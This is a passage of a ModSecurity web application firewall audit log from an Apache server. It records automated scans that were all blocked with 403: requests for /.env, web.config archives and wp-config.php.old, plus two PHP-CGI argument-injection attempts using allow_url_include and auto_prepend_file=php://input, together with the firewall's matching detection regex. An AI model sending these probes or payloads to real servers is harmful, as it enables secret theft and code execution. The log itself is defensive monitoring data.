Content-Type: text/html; charset=iso-8859-1
--3b90ea7f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745329724904801 826 (- - -)
Stopwatch2: 1745329724904801 826; combined=299, p1=262, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3b90ea7f-Z--
--068d3b12-A--
[22/Apr/2025:21:03:59 +0700] aAehz19gRrTzIZGIAflnhwAAAIo 103.236.140.4 36652 103.236.140.4 8181
--068d3b12-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 143.198.69.208
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 143.198.69.208
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--068d3b12-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--068d3b12-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745330639073557 816 (- - -)
Stopwatch2: 1745330639073557 816; combined=353, p1=317, p2=0, p3=0, p4=0, p5=36, sr=125, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--068d3b12-Z--
--b7e7b666-A--
[22/Apr/2025:21:14:13 +0700] aAekNc0DNRaK3AYHswJb3AAAABg 103.236.140.4 39056 103.236.140.4 8181
--b7e7b666-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.71.168
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.71.168
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: */*
--b7e7b666-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b7e7b666-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745331253139683 931 (- - -)
Stopwatch2: 1745331253139683 931; combined=461, p1=342, p2=0, p3=0, p4=0, p5=119, sr=128, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b7e7b666-Z--
--fc44ba55-A--
[22/Apr/2025:21:22:08 +0700] aAemEM0DNRaK3AYHswJcQAAAAAs 103.236.140.4 40994 103.236.140.4 8181
--fc44ba55-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
Accept-Charset: utf-8
--fc44ba55-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fc44ba55-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745331728791381 734 (- - -)
Stopwatch2: 1745331728791381 734; combined=295, p1=262, p2=0, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fc44ba55-Z--
--69fa9f74-A--
[22/Apr/2025:21:52:01 +0700] aAetEc0DNRaK3AYHswJeIAAAABM 103.236.140.4 48240 103.236.140.4 8181
--69fa9f74-B--
GET /.env HTTP/1.0
Host: petruk.hauganslekt.no
X-Real-IP: 64.225.75.246
X-Forwarded-Host: petruk.hauganslekt.no
X-Forwarded-Server: petruk.hauganslekt.no
X-Forwarded-For: 64.225.75.246
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--69fa9f74-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--69fa9f74-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745333521024501 766 (- - -)
Stopwatch2: 1745333521024501 766; combined=276, p1=242, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--69fa9f74-Z--
--3dc02753-A--
[22/Apr/2025:23:01:29 +0700] aAe9WV9gRrTzIZGIAflv2gAAAIM 103.236.140.4 39866 103.236.140.4 8181
--3dc02753-B--
GET /.env HTTP/1.0
Host: archiexnz.chickenkiller.com
X-Real-IP: 68.183.180.73
X-Forwarded-Host: archiexnz.chickenkiller.com
X-Forwarded-Server: archiexnz.chickenkiller.com
X-Forwarded-For: 68.183.180.73
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--3dc02753-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3dc02753-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745337689524598 708 (- - -)
Stopwatch2: 1745337689524598 708; combined=283, p1=247, p2=0, p3=0, p4=0, p5=36, sr=70, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3dc02753-Z--
--a9f8cc72-A--
[22/Apr/2025:23:19:51 +0700] aAfBpy3NG0xEq1F63-KCCAAAAEQ 103.236.140.4 44436 103.236.140.4 8181
--a9f8cc72-B--
GET /.env HTTP/1.0
Host: wooin.epicgamer.org
X-Real-IP: 146.190.242.161
X-Forwarded-Host: wooin.epicgamer.org
X-Forwarded-Server: wooin.epicgamer.org
X-Forwarded-For: 146.190.242.161
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--a9f8cc72-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a9f8cc72-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745338791499180 831 (- - -)
Stopwatch2: 1745338791499180 831; combined=293, p1=259, p2=0, p3=0, p4=0, p5=34, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a9f8cc72-Z--
--b01da02c-A--
[23/Apr/2025:00:33:00 +0700] aAfSzC3NG0xEq1F63-KGbAAAAFA 103.236.140.4 33454 103.236.140.4 8181
--b01da02c-B--
GET /web.config.zip HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 51.222.138.15
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 51.222.138.15
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
--b01da02c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b01da02c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745343180532944 663 (- - -)
Stopwatch2: 1745343180532944 663; combined=261, p1=228, p2=0, p3=0, p4=0, p5=33, sr=62, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b01da02c-Z--
--83bc3c75-A--
[23/Apr/2025:00:33:14 +0700] aAfS2s0DNRaK3AYHswJqYAAAAAs 103.236.140.4 33542 103.236.140.4 8181
--83bc3c75-B--
GET /web.config.rar HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 51.222.138.15
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 51.222.138.15
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
--83bc3c75-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--83bc3c75-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745343194797269 750 (- - -)
Stopwatch2: 1745343194797269 750; combined=293, p1=259, p2=0, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--83bc3c75-Z--
--c852667b-A--
[23/Apr/2025:00:33:29 +0700] aAfS6a3OiIHZ_gUDzTu7WQAAAM8 103.236.140.4 33626 103.236.140.4 8181
--c852667b-B--
GET /web.config.7z HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 51.222.138.15
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 51.222.138.15
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
--c852667b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c852667b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745343209271477 696 (- - -)
Stopwatch2: 1745343209271477 696; combined=292, p1=254, p2=0, p3=0, p4=0, p5=38, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c852667b-Z--
--7a8d9168-A--
[23/Apr/2025:00:33:43 +0700] aAfS9y3NG0xEq1F63-KGgwAAAE8 103.236.140.4 33710 103.236.140.4 8181
--7a8d9168-B--
GET /web.config.tar HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 51.222.138.15
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 51.222.138.15
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
--7a8d9168-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7a8d9168-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745343223882339 739 (- - -)
Stopwatch2: 1745343223882339 739; combined=298, p1=260, p2=0, p3=0, p4=0, p5=38, sr=70, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7a8d9168-Z--
--5d369a62-A--
[23/Apr/2025:00:33:58 +0700] aAfTBq3OiIHZ_gUDzTu7XQAAAM4 103.236.140.4 33794 103.236.140.4 8181
--5d369a62-B--
GET /web.config.gz HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 51.222.138.15
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 51.222.138.15
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
--5d369a62-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5d369a62-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745343238386916 799 (- - -)
Stopwatch2: 1745343238386916 799; combined=307, p1=269, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5d369a62-Z--
--ad737946-A--
[23/Apr/2025:01:55:38 +0700] aAfmKi3NG0xEq1F63-KL8gAAAFE 103.236.140.4 54896 103.236.140.4 8181
--ad737946-B--
POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 193.233.165.245
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 193.233.165.245
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Accept: */*
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Type: application/x-www-form-urlencoded
--ad737946-C--
--ad737946-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ad737946-E--
--ad737946-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745348138459513 5283 (- - -)
Stopwatch2: 1745348138459513 5283; combined=3592, p1=490, p2=3064, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ad737946-Z--
--a979844a-A--
[23/Apr/2025:02:43:32 +0700] aAfxZM0DNRaK3AYHswJ3JwAAABU 103.236.140.4 44922 103.236.140.4 8181
--a979844a-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.81.194
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.81.194
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG SM-G935F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36
Accept-Charset: utf-8
--a979844a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a979844a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745351012846606 708 (- - -)
Stopwatch2: 1745351012846606 708; combined=269, p1=240, p2=0, p3=0, p4=0, p5=28, sr=59, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a979844a-Z--
--d18d8351-A--
[23/Apr/2025:02:46:31 +0700] aAfyFy3NG0xEq1F63-KUHgAAAEE 103.236.140.4 49494 103.236.140.4 8181
--d18d8351-B--
GET /.env HTTP/1.0
Host: bolang.twilightparadox.com
X-Real-IP: 64.227.70.2
X-Forwarded-Host: bolang.twilightparadox.com
X-Forwarded-Server: bolang.twilightparadox.com
X-Forwarded-For: 64.227.70.2
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--d18d8351-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d18d8351-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745351191650069 849 (- - -)
Stopwatch2: 1745351191650069 849; combined=364, p1=324, p2=0, p3=0, p4=0, p5=40, sr=82, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d18d8351-Z--
--8f91b279-A--
[23/Apr/2025:02:58:46 +0700] aAf09q3OiIHZ_gUDzTvQuQAAAM4 103.236.140.4 34892 103.236.140.4 8181
--8f91b279-B--
POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 112.74.57.225
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 112.74.57.225
X-Forwarded-Proto: https
Connection: close
Content-Length: 221
Accept: */*
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Type: application/x-www-form-urlencoded
--8f91b279-C--
--8f91b279-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8f91b279-E--
--8f91b279-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745351926764581 5036 (- - -)
Stopwatch2: 1745351926764581 5036; combined=3706, p1=464, p2=3207, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8f91b279-Z--
--767fab11-A--
[23/Apr/2025:03:18:25 +0700] aAf5kV9gRrTzIZGIAfmHiQAAAJU 103.236.140.4 39638 103.236.140.4 8181
--767fab11-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 167.71.65.61
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 167.71.65.61
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--767fab11-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--767fab11-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745353105528546 737 (- - -)
Stopwatch2: 1745353105528546 737; combined=307, p1=270, p2=0, p3=0, p4=0, p5=37, sr=79, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--767fab11-Z--
--8a8b7338-A--
[23/Apr/2025:03:57:12 +0700] aAgCqNIw_rqnm4P5_acyFAAAAE0 103.236.140.4 48976 103.236.140.4 8181
--8a8b7338-B--
GET /wp-config.php.old HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 82.165.86.143
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 82.165.86.143
X-Forwarded-Proto: http
Connection: close
Accept: */*
--8a8b7338-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8a8b7338-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745355432214490 794 (- - -)
Stopwatch2: 1745355432214490 794; combined=301, p1=260, p2=0, p3=0, p4=0, p5=41, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8a8b7338-Z--
--5e2c0650-A--
[23/Apr/2025:04:09:25 +0700] aAgFhdIw_rqnm4P5_acy2QAAAEE 103.236.140.4 51924 103.236.140.4 8181
--5e2c0650-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36
Accept-Charset: utf-8
--5e2c0650-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5e2c0650-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745356165986265 781 (- - -)
Stopwatch2: 1745356165986265 781; combined=310, p1=271, p2=0, p3=0, p4=0, p5=38, sr=71, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5e2c0650-Z--
--abc1d218-A--
[23/Apr/2025:04:10:22 +0700] aAgFvhuwXEWV6ydgl53ogwAAAAo 103.236.140.4 52154 103.236.140.4 8181
--abc1d218-B--
GET /.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 45.148.10.172
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 45.148.10.172
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.42 Safari/537.36
Accept-Charset: utf-8
--abc1d218-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--abc1d218-H--
